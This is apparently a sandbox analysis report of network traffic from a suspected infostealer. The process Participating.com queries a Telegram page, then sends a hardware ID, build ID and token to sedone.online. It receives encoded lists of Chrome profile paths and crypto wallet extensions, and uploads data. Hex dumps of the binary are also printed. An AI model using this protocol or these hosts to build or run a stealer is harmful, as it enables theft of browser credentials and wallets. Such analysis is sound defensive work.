Dec 17, 2024 08:21:45.896817923 CET	1236	IN	Data Raw: 00 00 33 c0 66 89 06 66 89 07 e9 16 f7 ff ff 6a ee e8 58 f1 ff ff 8d 4d ec 51 50 89 45 bc e8 75 5f 00 00 33 c9 66 89 0e 89 45 f0 66 89 0f c7 45 fc 01 00 00 00 3b c3 0f 84 b8 0d 00 00 50 6a 40 ff 15 24 91 40 00 89 45 08 3b c3 0f 84 a4 0d 00 00 50 Data Ascii: 3ffjXMQPEu_3fEfE;Pj@$@E;PuSu4_t4EPEPh8@u_tEpV<EpW;]u0@Qjh VW}NuEVWh@jh VWNuE
Dec 17, 2024 08:21:45.896888971 CET	776	IN	Data Raw: 03 20 00 00 56 8d 45 b8 50 53 57 ff 15 44 91 40 00 8d 45 b8 50 56 ff 15 1c 91 40 00 e9 01 f2 ff ff 51 e8 03 3a 00 00 59 89 45 08 39 5d e4 75 44 6a 02 e8 5a ed ff ff 8b f8 3b fb 0f 84 10 f2 ff ff 6a 33 e8 52 ec ff ff 8b f0 56 57 ff 15 10 90 40 00 Data Ascii: VEPSWD@EPV@Q:YE9]uDjZ;j3RVW@Vh@AuEhP@:W@<j"Vuh$@:E;udGMQVP.E9]h;t=dGEEEjEjEWE
Dec 17, 2024 08:21:45.896923065 CET	1236	IN	Data Raw: 15 20 90 40 00 85 c0 0f 85 3c ef ff ff 33 c0 66 89 86 06 40 00 00 eb 9c 66 39 1e 0f 84 f8 05 00 00 56 e8 a5 34 00 00 50 ff 15 bc 90 40 00 e9 e6 05 00 00 6a ed e8 58 e9 ff ff ff 75 dc ff 75 d8 50 e8 6c 33 00 00 83 f8 ff 0f 85 c3 05 00 00 33 c0 66 Data Ascii: @<3f@f9V4P@jXuuPl33f Wj@$@E9]t3AM3@%jSSWujhASSH@uL@f9tSMQPuV4PT@EjYE0 ;~
Dec 17, 2024 08:21:45.896976948 CET	1236	IN	Data Raw: 41 01 00 00 6a 01 e8 6a 31 00 00 e9 35 01 00 00 6a 01 e8 a7 e4 ff ff 50 68 84 9a 40 00 e9 97 e9 ff ff 33 c9 e8 7f e4 ff ff 89 45 08 3b 05 cc ea 47 00 0f 83 3d ea ff ff 8b f0 8b 45 dc 69 f6 20 40 00 00 03 35 c8 ea 47 00 3b c3 7c 15 8b 0c 86 75 0a Data Ascii: Ajj15jPh@3E;G=Ei @5G;\|uVWQQ+Mt3A4EuFP8NEM9]uB3 9]t9]tP=SSqSyR9]tMG
Dec 17, 2024 08:21:45.897105932 CET	1236	IN	Data Raw: 41 43 00 a3 84 41 43 00 e8 21 42 00 00 89 45 ec 85 c0 0f 88 ae 00 00 00 8b 35 80 41 43 00 2b f7 ff d3 f6 05 94 eb 47 00 01 8b f8 74 49 2b 45 f0 3d c8 00 00 00 77 06 83 7d 14 00 75 39 ff 75 08 8b 45 08 2b 45 14 6a 64 50 ff 15 50 91 40 00 50 8d 85 Data Ascii: ACAC!BE5AC+GtI+E=w}u9uE+EjdPP@Phh@PH@hPj}3;t?9Eu PEPVuuT@t69uu1uACu)uE}979E,jj;tb9u}uVSuu
Dec 17, 2024 08:21:46.017558098 CET	1236	IN	Data Raw: 08 6a 22 5e b8 a2 f0 4c 00 56 50 e8 dc 23 00 00 50 ff 15 60 92 40 00 8b f0 89 74 24 1c e9 8e 00 00 00 6a 20 5b 66 3b c3 75 08 83 c6 02 66 39 1e 74 f8 66 83 3e 22 75 06 6a 22 83 c6 02 5b 66 83 3e 2f 75 5a 83 c6 02 66 83 3e 53 75 13 0f b7 46 02 83 Data Ascii: j"^LVP#P`@t$j [f;uf9tf>"uj"[f>/uZf>SuF tf;uL$jh@@VyuF tf;uL$jFh4@POt SVG#f>"uf;fjFUP<HVh0M&0NSh @

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49887	149.154.167.99	443	1252	C:\Users\user\AppData\Local\Temp\615578\Participating.com

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:22:44 UTC	86	OUT	GET /detct0r HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-12-17 07:22:45 UTC	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 17 Dec 2024 07:22:44 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12323 Connection: close Set-Cookie: stel_ssid=9a035fe559a1442f69_9067502605037646304; expires=Wed, 18 Dec 2024 07:22:44 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-12-17 07:22:45 UTC	12323	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 64 65 74 63 74 30 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @detct0r</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49894	116.203.12.114	443	1252	C:\Users\user\AppData\Local\Temp\615578\Participating.com

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:22:47 UTC	233	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Connection: Keep-Alive Cache-Control: no-cache
2024-12-17 07:22:48 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 17 Dec 2024 07:22:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-17 07:22:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49902	116.203.12.114	443	1252	C:\Users\user\AppData\Local\Temp\615578\Participating.com

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:22:49 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----PHLFC2NGVAAIEUSR9RI5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-12-17 07:22:49 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 50 48 4c 46 43 32 4e 47 56 41 41 49 45 55 53 52 39 52 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 38 42 36 32 37 43 32 43 36 30 35 32 34 35 38 35 30 34 38 39 33 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 50 48 4c 46 43 32 4e 47 56 41 41 49 45 55 53 52 39 52 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 50 48 4c 46 43 32 4e 47 56 41 41 49 45 55 53 52 39 52 49 35 2d 2d 0d Data Ascii: ------PHLFC2NGVAAIEUSR9RI5Content-Disposition: form-data; name="hwid"98B627C2C6052458504893-a33c7340-61ca------PHLFC2NGVAAIEUSR9RI5Content-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------PHLFC2NGVAAIEUSR9RI5--
2024-12-17 07:22:50 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 17 Dec 2024 07:22:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-17 07:22:50 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 64 64 34 64 30 35 37 36 34 30 37 61 37 37 33 31 32 37 64 62 32 37 37 33 34 65 36 61 36 36 30 33 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|dd4d0576407a773127db27734e6a6603\|1\|0\|1\|1\|0\|50000\|00

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49907	116.203.12.114	443	1252	C:\Users\user\AppData\Local\Temp\615578\Participating.com

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:22:52 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----C2VKNG4E3W47YMGLXB1N User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-17 07:22:52 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 32 56 4b 4e 47 34 45 33 57 34 37 59 4d 47 4c 58 42 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 64 34 64 30 35 37 36 34 30 37 61 37 37 33 31 32 37 64 62 32 37 37 33 34 65 36 61 36 36 30 33 0d 0a 2d 2d 2d 2d 2d 2d 43 32 56 4b 4e 47 34 45 33 57 34 37 59 4d 47 4c 58 42 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 43 32 56 4b 4e 47 34 45 33 57 34 37 59 4d 47 4c 58 42 31 4e 0d 0a 43 6f 6e 74 Data Ascii: ------C2VKNG4E3W47YMGLXB1NContent-Disposition: form-data; name="token"dd4d0576407a773127db27734e6a6603------C2VKNG4E3W47YMGLXB1NContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------C2VKNG4E3W47YMGLXB1NCont
2024-12-17 07:22:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 17 Dec 2024 07:22:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-17 07:22:52 UTC	2192	IN	Data Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49913	116.203.12.114	443	1252	C:\Users\user\AppData\Local\Temp\615578\Participating.com

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:22:54 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----J5P8Q9RIE3WBAI5XBSR1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-17 07:22:54 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 35 50 38 51 39 52 49 45 33 57 42 41 49 35 58 42 53 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 64 34 64 30 35 37 36 34 30 37 61 37 37 33 31 32 37 64 62 32 37 37 33 34 65 36 61 36 36 30 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 35 50 38 51 39 52 49 45 33 57 42 41 49 35 58 42 53 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 35 50 38 51 39 52 49 45 33 57 42 41 49 35 58 42 53 52 31 0d 0a 43 6f 6e 74 Data Ascii: ------J5P8Q9RIE3WBAI5XBSR1Content-Disposition: form-data; name="token"dd4d0576407a773127db27734e6a6603------J5P8Q9RIE3WBAI5XBSR1Content-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------J5P8Q9RIE3WBAI5XBSR1Cont
2024-12-17 07:22:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 17 Dec 2024 07:22:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-17 07:22:55 UTC	5837	IN	Data Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49918	116.203.12.114	443	1252	C:\Users\user\AppData\Local\Temp\615578\Participating.com

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:22:56 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----PHLFC2NGVAAIEUSR9RI5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-12-17 07:22:56 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 50 48 4c 46 43 32 4e 47 56 41 41 49 45 55 53 52 39 52 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 64 34 64 30 35 37 36 34 30 37 61 37 37 33 31 32 37 64 62 32 37 37 33 34 65 36 61 36 36 30 33 0d 0a 2d 2d 2d 2d 2d 2d 50 48 4c 46 43 32 4e 47 56 41 41 49 45 55 53 52 39 52 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 50 48 4c 46 43 32 4e 47 56 41 41 49 45 55 53 52 39 52 49 35 0d 0a 43 6f 6e 74 Data Ascii: ------PHLFC2NGVAAIEUSR9RI5Content-Disposition: form-data; name="token"dd4d0576407a773127db27734e6a6603------PHLFC2NGVAAIEUSR9RI5Content-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------PHLFC2NGVAAIEUSR9RI5Cont
2024-12-17 07:22:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 17 Dec 2024 07:22:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-17 07:22:57 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49925	116.203.12.114	443	1252	C:\Users\user\AppData\Local\Temp\615578\Participating.com

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:22:59 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----YCBAAI58YMYM7QQ9ZM7G User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 7173 Connection: Keep-Alive Cache-Control: no-cache
2024-12-17 07:22:59 UTC	7173	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 59 43 42 41 41 49 35 38 59 4d 59 4d 37 51 51 39 5a 4d 37 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 64 34 64 30 35 37 36 34 30 37 61 37 37 33 31 32 37 64 62 32 37 37 33 34 65 36 61 36 36 30 33 0d 0a 2d 2d 2d 2d 2d 2d 59 43 42 41 41 49 35 38 59 4d 59 4d 37 51 51 39 5a 4d 37 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 59 43 42 41 41 49 35 38 59 4d 59 4d 37 51 51 39 5a 4d 37 47 0d 0a 43 6f 6e 74 Data Ascii: ------YCBAAI58YMYM7QQ9ZM7GContent-Disposition: form-data; name="token"dd4d0576407a773127db27734e6a6603------YCBAAI58YMYM7QQ9ZM7GContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------YCBAAI58YMYM7QQ9ZM7GCont
2024-12-17 07:23:00 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 17 Dec 2024 07:23:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-17 07:23:00 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49929	116.203.12.114	443	1252	C:\Users\user\AppData\Local\Temp\615578\Participating.com

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:23:00 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----YCBAAI58YMYM7QQ9ZM7G User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
2024-12-17 07:23:00 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 59 43 42 41 41 49 35 38 59 4d 59 4d 37 51 51 39 5a 4d 37 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 64 34 64 30 35 37 36 34 30 37 61 37 37 33 31 32 37 64 62 32 37 37 33 34 65 36 61 36 36 30 33 0d 0a 2d 2d 2d 2d 2d 2d 59 43 42 41 41 49 35 38 59 4d 59 4d 37 51 51 39 5a 4d 37 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 59 43 42 41 41 49 35 38 59 4d 59 4d 37 51 51 39 5a 4d 37 47 0d 0a 43 6f 6e 74 Data Ascii: ------YCBAAI58YMYM7QQ9ZM7GContent-Disposition: form-data; name="token"dd4d0576407a773127db27734e6a6603------YCBAAI58YMYM7QQ9ZM7GContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------YCBAAI58YMYM7QQ9ZM7GCont
2024-12-17 07:23:01 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 17 Dec 2024 07:23:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-17 07:23:01 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49940	172.217.19.228	443	7672	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:23:04 UTC	595	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-17 07:23:05 UTC	1266	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:23:05 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-iNL48lpWFPxhW7VC9CSSqQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-17 07:23:05 UTC	124	IN	Data Raw: 33 36 39 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 77 65 65 6b 20 31 36 20 66 61 6e 74 61 73 79 20 66 6f 6f 74 62 61 6c 6c 20 72 61 6e 6b 69 6e 67 73 22 2c 22 63 61 6e 61 64 61 20 70 6f 73 74 61 6c 20 77 6f 72 6b 65 72 73 20 73 74 72 69 6b 65 22 2c 22 62 65 79 6f 6e 64 20 74 68 65 20 73 70 69 64 65 72 20 76 65 72 73 65 20 72 65 6c 65 61 73 65 20 64 61 74 65 22 2c 22 65 6c Data Ascii: 369)]}'["",["week 16 fantasy football rankings","canada postal workers strike","beyond the spider verse release date","el
